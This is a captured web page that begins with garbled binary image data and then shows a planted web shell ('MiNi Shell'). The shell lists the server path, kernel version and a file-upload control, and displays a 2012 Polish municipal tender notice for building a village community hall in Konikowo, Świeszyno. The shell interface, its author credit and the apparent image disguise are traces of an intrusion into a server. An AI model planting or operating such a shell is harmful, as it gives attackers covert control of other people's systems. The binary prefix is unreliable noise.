JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120423/128670-N-2012.html

<p class="kh_header"><b>Świeszyno: budowa świetlicy wiejskiej wraz z wewnętrzną instalacją gazową, zewnętrzną instalacją wodociągową, zewnętrzną instalacją kanalizacji sanitarnej oraz zewnętrzną instalacją energetyczną zalicznikową oraz parkingiem w m. Konikowo gmina Świeszyno dz. nr 106/3</b><br>
<b>Numer ogłoszenia: 128670 - 2012; data zamieszczenia: 23.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świeszyno , Świeszyno 71, 76-024 Świeszyno, woj. zachodniopomorskie, tel. 94 31 60 120, faks 94 31 61 491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ug.swieszyno.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> budowa świetlicy wiejskiej wraz z wewnętrzną instalacją gazową, zewnętrzną instalacją wodociągową, zewnętrzną instalacją kanalizacji sanitarnej oraz zewnętrzną instalacją energetyczną zalicznikową oraz parkingiem w m. Konikowo gmina Świeszyno dz. nr 106/3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Program użytkowy:
     Świetlicy o wymiarach 8,15m x 11,55m wraz z odpowiednim zapleczem. W zapleczu zaprojektowano szatnię, sanitariaty, pokój biurowy, pokój komputerowy oraz kuchnię. Sanitariaty zaprojektowano: dla kobiet 3 kabiny, dla mężczyzn 2 kabiny oraz 3 pisuary. W sanitariacie dla kobiet jedną kabinę  przeznaczono dla osób niepełnosprawnych. W przedsionkach sanitariatów projektuje się zainstalowanie po 3 umywalki. W kuchni przewiduje się gotowanie wody na herbatę i kawę, przygotowywanie kanapek, porcjowanie herbatników i innych tego typu produktów oraz mycie talerzyków i szklanek. Gotowania potraw nie przewiduje się. Wyposażenie kuchni: szafka na naczynia, stół roboczy, zmywarka do naczyń, kuchenka do gotowania wody. Do zlewozmywaka doprowadzona zostanie zimna i ciepła woda. Pokój komputerowy przewidziano dla 4 osób. Wyposażenie: 4 stoły pod komputery, 4 krzesła, szafa na sprzęt. Pokój biurowy pełni równocześnie funkcję magazynu sprzętu świetlicowego. Wyposażenie: biurko, dwa krzesła, szafy. W szatni przewidziano ladę oraz wieszaki na płaszcze.
Powierzchnia wewnętrzna - całkowita                                 -      178,84 m2
Powierzchnia zabudowy                                                      -      210,17 m2
Wysokość do okapu                                                            -          2,80 m
Wysokość do kalenicy                                                         -          5,66 m
Liczba kondygnacji nadziemnych                                       -         1
2. Forma architektoniczna:
Budynek jednokondygnacyjny, nie podpiwniczony kryty dachem o pochyleniu 30o. Dach kryty blachówko dachówką w kolorze czerwonym. Budynek składa się z 2 brył - Sali świetlicy oraz zaplecza. Okapy dachów obu elementów obiektu zaprojektowano na jednym poziomie. Kalenica hali świetlicy jest 60 cm powyżej kalenicy zaplecza. Przed wejściem do świetlicy zaprojektowano daszek na całej długości zaplecza stanowiący osłonę wejścia do świetlicy przed deszczem i śniegiem.
3.  Warunki gruntowe
Dokumentacja geologiczna podłoża gruntowego została wykonana przez Zakład geologiczny mgr M. Mazurkiewicza. Stwierdzono, że pod warstwą gleby zalegają wilgotne, spoiste piaski gliniaste z domieszką żwiru. Grunty te zalegające na głębokości 1,0 do 13 m są gruntami nośnymi i nadają się do posadowienia budynku. Obiekt zakwalifikowano do drugiej kategorii geotechnicznej.
4.  Fundamenty
Wykopy pod ławy fundamentowe należy wykonać ręcznie aby nie naruszyć istniejącej struktury gruntu. Wykopy należy wykonać do poziomu gruntu nośnego to jest spoistych piasków gliniastych z domieszką żwiru. Pod ławami fundamentowymi należy wykonać podsypkę z dobrze ubitego piasku stabilizowanego cementem. Ławy fundamentowe i ściany fundamentowe projektuje się wylewane z betonu żwirowego B-15. Ławy fundamentowe zbrojone stalą A-0.
5.  Ściany
Ściany zewnętrzne budynku zaprojektowano warstwowe z bloczków i płytek gazobetonowych odmiany 09 z ociepleniem z wełny mineralnej. Ściany wewnętrzne - nośne zaprojektowano z cegły ceramicznej klasy 100 na zaprawie cementowo - wapiennej 1: 1: 6. Ścianki działowe zaprojektowano z cegły ceramicznej klasy 100 na zaprawie cementowo - wapiennej 1: 0,5 : 4,5. Nadproża okienne i drzwiowe z prefabrykowanych belek L-19. Nadproże nad drzwiami rozsuwanymi wylewane na mokro z betonu B-15 zbrojonego stalą A-III. Ościeżnice drzwiowe stalowe, osadzone w czasie wznoszenia ścian.
6. Strop
Nad zapleczem zaprojektowano strop na belkach stalowych. Wypełnienie przestrzeni między belkami płytkami gazobetonowymi o grubości 12 cm odmiany 09 zbrojone w systemie Kleina między płytkami wykonane z prętów żebrowanych O 6mm.
7. daszek nad wejściem
Daszek nad wejściem zaprojektowano w postaci płyty żelbetowej - wspornikowej. Płytę projektuje się wylać z betonu żwirowego B-15 zbrojonego stalą A-III oraz A-0. Spadek daszku wynoszący 2% zostanie uzyskany przez zmianę grubości płyty.
8. Dachy:
Dach świetlicy zaprojektowano w układzie jętkowym. Krokwie ze względu na ich długość zaprojektowano jako belki zbijane ze środnikiem z krzyżujących się desek. Gwoździe 5x150 należy wbijać w uprzednio nawiercone otwory. Jętki należy połączyć z krokwiami przy pomocy śrub M-14.
Do krokwi i jętek od dołu należy przybić jednostronnie strugane deski stanowiące sufit świetlicy. Na wykonanym deskowaniu projektuje się ułożenie ocieplenia z wełny mineralnej. Grubość ocieplenia - 16 cm. Wełnę należy okryć folią igielitową.
Nad zapleczem świetlicy zaprojektowano dach o ustroju kleszczowo - płatwiowym. Krokwie zostaną oparte na płatwi kalenicowej i murłatach. Płatew kalenicowa położona zostanie na słupach i podporach zastrzałami. Wszystkie pary kotwi przy kalenicy zostaną wzmocnione grzędą wykonaną z dwóch desek. Kleszcze wykonane z dwóch desek będą łączyły słupy z krokwiami.
Od góry należy nabić deskowanie, położyć folię budowlaną, nabić kontrłaty i łaty na których zostanie położone pokrycie dachowe z blacho dachówki.
9. Posadzki:
Po usunięciu ziemi roślinnej należy wykonać podsypkę piaskową  oraz podłoże z betonu B-15. Grubość podłoża betonowego - 20 cm. Na wykonanym podłożu należy ułożyć twardy styropian o grubości 4 cm i po ułożeniu folii budowlanej pokryć go gładzią cementową o grubości 5 cm. Na tak przygotowanym podłożu należy ułożyć posadzkę z terakoty lub podłogę z desek ( w zależności od przeznaczenia pomieszczenia).
10. Tynki:
Przewiduje się wykonanie na wszystkich ścianach wewnętrznych i stropach zaplecza tynków gładkich z zaprawy cementowo - wapiennej. W pomieszczeniach sanitarnych ściany na całej wysokości należy wyłożyć glazurą.
11. Instalacje:
Instalacje wodociągowe:
Zaprojektowano przyłącze wodociągowe z rur PE 32 mm włączone do istniejącej sieci wodociągowej O 80 w drodze dz. nr 107-2. Przewód wodociągowy należy prowadzić na głębokości nie mniejszej niż 1,3 m poniżej projektowanego poziomu terenu. Wejście wody do budynku - do pomieszczenia biurowego 10, gdzie zostanie zainstalowana konsola z zainstalowanym zaworem odcinającym, wodomierzem i zaworem zwrotnym.
Wewnętrzna instalacja wodociągowa
Wewnętrzna instalacja wodociągowa zostanie wykonana z rur miedzianych łączonych przez lutowanie cyną. Wszystkie rury po zainstalowaniu i sprawdzeniu szczelności należy zaizolować.
Woda zimna:
Zimna woda zostanie doprowadzona w kuchni do zlewozmywaka i kociołka c. o., w  przedsionkach w.c. do umywalek, spłuczek klozetowych w pomieszczeniach 5, 6, 7, pisuarów w pomieszczeniu 8. W przedsionkach w.c. należy zainstalować przy jednej z umywalek niezależnie od baterii zawór ze złączką do węża.
Woda ciepła:
Woda ciepła będzie doprowadzona do zlewozmywaka w kuchni oraz do wszystkich umywalek.
Kanalizacja wewnętrzna:
Instalację kanalizacji projektuje się wykonać z rur PCV. Rury należy ułożyć pod posadzką ze spadkiem wynoszącym 1,5% w kierunku studzienki rewizyjnej.
Przyłącze;
Przyłącze od studzienki rewizyjnej do studzienki 38,95-36,68 ustawionej na przewodzie kanalizacyjnym O 150 przebiegającym w drodze dz. 107-2 należy wykonać z rury PCV - O 100 ułożonej ze spadkiem i = 7,5%.

Centralne ogrzewanie:
Projektuje się instalację centralnego ogrzewania pompową z dolnym rozdziałem. Projektuje się zainstalowanie w pomieszczeniu kuchni kotła wielofunkcyjnego zasilanego gazem. Grzejniki stalowe płytowe. Projektuje się wykonanie instalacji z rur miedzianych łączonych przez lutowanie cyną. Kocioł centralnego ogrzewania będzie również dostarczał ciepłą wodę do zlewozmywaka w kuchni oraz umywalek w sanitariatach. Rury przewiduje się prowadzić w kanalikach pod posadzką. Przy układaniu rur należy podpory usytuować tak aby zapewnić naturalną kompensację termiczną. Rury prowadzone pod posadzką należy zaizolować.
Gaz:
Gaz do budynku będzie prowadzony od przewodu gazowego średniego ciśnienia O 63 ułożonego w drodze dz. 107/2 do szafki umieszczonej na budynku przewodem z rur PE 100RC SDR 11 o średnicy nominalnej 32 mm. W szafce należy umieścić kurek główny, reduktor oraz gazomierz miechowy G4
Wewnętrzną instalację gazową projektuje się wykonać z rur stalowych bez szwu łączonych przez spawanie. Gaz  w budynku zostanie doprowadzony do kuchenki gazowej czteropalnikowej z piekarnikiem oraz kociołka gazowego zasilającego instalację centralnego ogrzewania i dostarczającego ciepłą wodę do zlewozmywaka i umywalek.
Przewody gazowe w budynku będą prowadzone na tynku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>w zależności od potrzeb do 20% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.21.00.00-2, 45.21.23.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 15 000,00 zł (słownie: piętnaście tysięcy złotych),  w terminie do  14.05.2012r. godz. 1000 na konto: Bałtycki Bank Spółdzielczy w Darłowie 46 8566 0003 0001 0360 2000 0001.
Wadium może być wnoszone w jednej lub kilku następujących formach: 
a.	pieniądzu;
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga, by osoba pełniąca funkcję kierownika budowy posiadała uprawnienia budowlane oraz przynależała do właściwej Izby Inżynierów Budownictwa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie, że wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, co najmniej trzy roboty polegające na budowie budynków o wartości min. 500 tys. złotych (pięćset tysięcy złotych) netto - jeden budynek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: 
a)  zamawiający wymaga, by osoba pełniąca funkcję kierownika budowy posiadała uprawnienia budowlane oraz przynależała do właściwej Izby Inżynierów Budownictwa.
b)  Wykonawca dysponuje potencjałem kadrowym niezbędnym do wykonania przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia: 
a)  zamawiający wymaga, by osoba pełniąca funkcję kierownika budowy posiadała uprawnienia budowlane oraz przynależała do właściwej Izby Inżynierów Budownictwa.
b)  Wykonawca dysponuje potencjałem kadrowym niezbędnym do wykonania przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Wypełniony formularz ofertowy (załącznik nr 3 do SIWZ).
- Pełnomocnictwo, jeżeli oferta nie została podpisana przez osoby upoważnione do  
   tych czynności dokumentem rejestracyjnym oraz w przypadku podmiotów
   występujących wspólnie.
-  Wskazanie części zamówienia, której wykonanie Wykonawca zamierza powierzyć
    podwykonawcom. Brak oświadczenia w sprawie powierzenia wykonania części 
    zamówienia podwykonawcom, uznany będzie za zobowiązanie do samodzielnego
     wykonania zamówienia.
-   Szczegółowy Kosztorys Ofertowy, sporządzony w oparciu o przedmiar  robót 
     (załącznik nr 6 )
-   Potwierdzenie wniesienia wadium na rachunek bankowy Bałtycki Bank
     Spółdzielczy w Darłowie 46 8566 0003 0001 0360 2000 0001</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ug.swieszyno.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Materiały przetargowe bezpłatnie udostępnione są na stronie internetowej ug.swieszyno.ibip.pl  Na Wniosek wykonawcy Zamawiający przekazuje ( wciągu siedmiu dni) SIWZ w formie papierowej..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2012 godzina 10:00, miejsce: Urząd Gminy Świeszyno, 76-024 Swieszyno 71 sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt dofinansowany w ramach działania 413 Wdrażanie Lokalnych Strategii Rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania - Odnowa i rozwój wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com